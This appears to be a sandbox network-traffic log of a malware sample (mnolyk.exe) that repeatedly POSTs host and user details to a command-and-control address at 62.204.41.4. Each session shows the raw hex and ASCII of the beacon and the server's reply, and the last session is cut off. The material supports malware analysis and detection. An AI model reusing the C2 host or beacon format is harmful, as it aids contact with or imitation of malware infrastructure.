                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        12 | 192.168.2.5 | 49702 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:31.544826984 CET | 212 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.609515905 CET | 213 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        120 | 192.168.2.5 | 49810 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:20.127758026 CET | 321 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.195579052 CET | 322 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        121 | 192.168.2.5 | 49811 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:20.370368958 CET | 322 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.433793068 CET | 323 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        122 | 192.168.2.5 | 49812 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:20.620291948 CET | 323 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.683015108 CET | 324 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        123 | 192.168.2.5 | 49813 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:20.872292042 CET | 324 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.936855078 CET | 325 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        124 | 192.168.2.5 | 49814 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:21.151913881 CET | 325 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.216082096 CET | 326 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        125 | 192.168.2.5 | 49815 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:21.391572952 CET | 326 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.455930948 CET | 327 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        126 | 192.168.2.5 | 49816 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:21.645116091 CET | 327 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.707312107 CET | 328 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        127 | 192.168.2.5 | 49817 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:21.886399984 CET | 328 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:21.951565027 CET | 329 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        128 | 192.168.2.5 | 49818 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:22.140346050 CET | 329 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.207415104 CET | 330 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        129 | 192.168.2.5 | 49819 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:22.395200968 CET | 330 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.459952116 CET | 331 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        13 | 192.168.2.5 | 49703 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:31.801911116 CET | 213 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.868216991 CET | 214 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        130 | 192.168.2.5 | 49820 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:22.659075975 CET | 331 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.724231958 CET | 332 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        131 | 192.168.2.5 | 49821 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:22.892786026 CET | 332 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:22.957637072 CET | 333 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        132 | 192.168.2.5 | 49822 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:23.172086954 CET | 333 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.237900972 CET | 334 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        133 | 192.168.2.5 | 49823 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:23.433454037 CET | 334 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.496156931 CET | 335 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        134 | 192.168.2.5 | 49824 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:23.678412914 CET | 335 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.740700006 CET | 336 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        135 | 192.168.2.5 | 49825 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:23.920192003 CET | 336 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:23.984153032 CET | 337 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        136 | 192.168.2.5 | 49826 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:24.159354925 CET | 337 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:24.226125956 CET | 338 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        137 | 192.168.2.5 | 49827 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:24.402563095 CET | 338 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
